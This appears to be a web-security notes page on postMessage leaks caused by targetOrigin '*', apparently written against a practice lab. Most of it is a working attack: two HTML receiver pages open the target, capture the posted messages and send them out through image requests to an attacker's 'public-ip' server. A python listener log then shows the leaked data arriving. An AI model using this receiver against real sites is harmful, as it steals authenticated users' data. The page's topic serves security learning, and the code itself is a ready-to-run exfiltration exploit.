Skip to main content

origin-as-wildcard

Origin as Wildcard (*)

A postMessage vulnerability occurs when sensitive data is sent with targetOrigin="*", allowing any malicious site to receive authenticated data via cross-origin messaging.

The Attack

  1. Find where postMessege() is being used with *. Then analyze what data is being transfered.

Make a index.html page like so:

<!DOCTYPE html>
<html>
<body>

<h3>postMessage Leak Receiver PoC</h3>
<p>Visit this page → if target sends data via postMessage to *, it gets leaked to your server.</p>

<script>
// Listen for any message (no origin check on our side)
window.addEventListener("message", function(event) {
  let leaked = event.data;

  // Sometimes it's JSON, sometimes string, object, etc.
  if (leaked && typeof leaked === "object") {
    leaked = JSON.stringify(leaked);
  } else if (!leaked) {
    leaked = "empty";
  }

  // Stealth exfil via image (bypasses many CSP)
  const img = new Image();
  img.src = "http://public-ip/?leak=" + encodeURIComponent(leaked);

  // Debug in console / on page
  console.log("Leaked via postMessage:", leaked, "from origin:", event.origin);
  document.body.innerHTML += "<p>Leaked: " + leaked + " (from " + event.origin + ")</p>";
}, false);

// Open the vulnerable page (popup or iframe)
setTimeout(() => {
  // Option A: popup (sometimes postMessage goes to opener)
  window.open("http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/0");

  // Option B: iframe (if it posts to parent)
  // const ifr = document.createElement("iframe");
  // ifr.src = "http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/1";
  // ifr.style.display = "none";
  // document.body.appendChild(ifr);
}, 500);

</script>

</body>
</html>

mini.html

<script>
window.addEventListener("message", e => {
  if (e.data) new Image().src = `http://public-ip/?pm=${encodeURIComponent(e.data)}`;
});
window.open("http://ptl-1786c44be9f1-e9554eed049e.libcurl.me/key/0");
</script>

And run python server:

╰─➤  python3 -m http.server 5959
Serving HTTP on 0.0.0.0 port 5959 (http://0.0.0.0:5959/) ...

Send it to victim then wait:

╰─➤  python3 -m http.server 5959
Serving HTTP on 0.0.0.0 port 5959 (http://0.0.0.0:5959/) ...
3.237.37.47 - - [18/Jan/2026 06:56:14] "GET / HTTP/1.1" 200 -
3.237.37.47 - - [18/Jan/2026 06:56:15] "GET /?leak=%7B%22id%22%3A0%2C%22value%22%3A%....snip.... HTTP/1.1" 200 -